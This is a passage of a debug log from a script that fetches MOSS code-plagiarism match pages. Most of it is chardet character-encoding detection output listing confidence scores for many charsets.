confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5368806961752206\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.531539991108428\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5512264005800802\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match123-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match123-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match127-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match127-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match127-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match129-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match129-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match129-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match124-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19294\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19281\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19294\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19281\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19281\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19282\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19281\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32291\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32278\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32291\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32278\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32278\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5439906528552106\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32279\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32278\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.531539991108428\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match124-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match124-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match130-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match130-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match130-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match131-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match131-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match131-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24834\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16938\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32299\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24821\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16925\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32286\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24834\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16938\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16925\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24821\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32299\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16925\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24821\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32286\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16926\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24822\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32286\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16925\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24821\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32287\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32286\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5297867728427197\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5307566789403784\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5313515198422755\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match132-top.html\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match132-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match132-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match134-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match133-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match133-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match133-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match134-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match134-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32109\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21276\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32096\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32109\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32096\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21277\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32096\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21276\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40778\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32097\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32096\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40765\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match135-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match135-0.html\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match135-1.html\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40778\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40765\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40765\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40766\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40765\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5326929669857815\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5356196010713635\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5580147851981956\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match136-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match136-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match136-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match137-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match137-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match137-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 18750\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 18737\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 18750\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 18737\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 18737\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 18738\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 18737\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5439906528552106\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match138-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match138-0.html\nDEBUG:root:Processing URL: 